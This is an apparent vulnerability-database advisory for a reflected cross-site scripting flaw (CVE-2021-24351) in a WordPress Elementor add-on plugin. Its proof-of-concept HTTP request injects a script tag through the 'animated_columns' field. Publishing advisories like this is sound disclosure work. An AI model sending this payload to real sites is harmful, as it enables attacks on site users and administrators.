The Plus Addons for Elementor < 4.1.12 – Reflected Cross-Site Scripting (XSS) | CVE 2021-24351 | Plugin Vulnerabilities

Description

The theplus_more_post AJAX action of the plugin did not properly sanitise some of its fields, leading to a reflected Cross-Site Scripting (exploitable on both unauthenticated and authenticated users)

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 174
Connection: close

action=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(%2fXSS%2f)%3c%2fscript%3e

Affects Plugins

theplus_elementor_addon

Fixed in 4.1.12

References

CVE

URL

https://theplusaddons.com/changelog/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Nicolas VERDIER from TEHTRIS

Submitter

Nicolas VERDIER from TEHTRIS

Submitter twitter

Verified

Yes

WPVDB ID

2ee62f85-7aea-4b7d-8b2d-5d86d9fb8016

Timeline

Publicly Published

2021-05-31 (about 4 years ago)

Added

2021-05-31 (about 4 years ago)

Last Updated

2021-06-01 (about 4 years ago)

Other

Published

Title

Published

2023-11-07

Title

WP Edit Username < 1.0.6 - Admin+ Stored XSS

Published

2022-11-28

Title

Popup Manager <= 1.6.6 - Unauthenticated Stored XSS

Published

2024-10-25

Title

Monkee-Boy Essentials <= 1.1 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload

Published

2024-10-14

Title

El mejor Cluster < 1.1.16 - Contributor+ Stored XSS

Published

2025-11-12

Title

WordPress Content Flipper <= 0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting